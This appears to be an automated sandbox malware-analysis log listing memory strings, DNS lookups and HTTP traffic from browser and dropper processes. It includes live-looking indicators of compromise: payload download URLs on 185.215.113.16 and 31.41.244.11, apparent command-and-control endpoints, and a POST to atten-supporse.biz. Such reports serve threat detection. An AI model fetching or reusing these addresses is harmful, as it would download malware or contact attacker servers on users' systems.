Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Scheme should be either http or https_injectDefaultProtocolHandlersIfNeededhttps://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://www.inbox.lv/rfc2368/?value=%sisDownloadsImprovementsAlreadyMigratedhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1 equals www.yahoo.com (Yahoo)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ipc:first-content-process-createdresource://gre/modules/amManager.sys.mjssitepermsaddon-provider-registeredspeculativeConnectWithOriginAttributes@mozilla.org/spellchecker/engine;1@mozilla.org/network/file-output-stream;1https://smartblock.firefox.etp/play.svg@mozilla.org/addons/addon-manager-startup;1resource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter@mozilla.org.xpiFileUtils_closeSafeFileOutputStream*://static.chartbeat.com/js/chartbeat.js*://static.criteo.net/js/ld/publishertag.js*://*.imgur.com/js/vendor.*.bundle.js*://libs.coremetrics.com/eluminate.js*://track.adform.net/serving/scripts/trackpoint/@mozilla.org/network/atomic-file-output-stream;1*://auth.9c9media.ca/auth/main.js*://*.imgur.io/js/vendor.*.bundle.jsresource://gre/modules/FileUtils.sys.mjs*://www.rva311.com/static/js/main.*.chunk.js*://c.amazon-adsystem.com/aax2/apstag.js*://connect.facebook.net/*/all.js**://www.everestjs.net/static/st.v3.js**://connect.facebook.net/*/sdk.js*pictureinpicture%40mozilla.org:1.0.0@mozilla.org/network/safe-file-output-stream;1*://static.chartbeat.com/js/chartbeat_video.jshttps://smartblock.firefox.etp/facebook.svgresource://gre/modules/TelemetryStorage.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2925250004.000001DEF10F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: home.twentykx20pt.top
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001242000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2954316524.000000000113A000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeI
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeze
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe7
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe:
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeC
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeo
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exeR
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpG
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206?
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957851747.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exeD
Source: skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exeshqos.dll
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique1/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe1
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe1aa;
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe6%
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe60N
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe60ac02b4ded8abeee1fbdemp
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe7d
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe7d1
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exed
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exeedQ
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exej
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
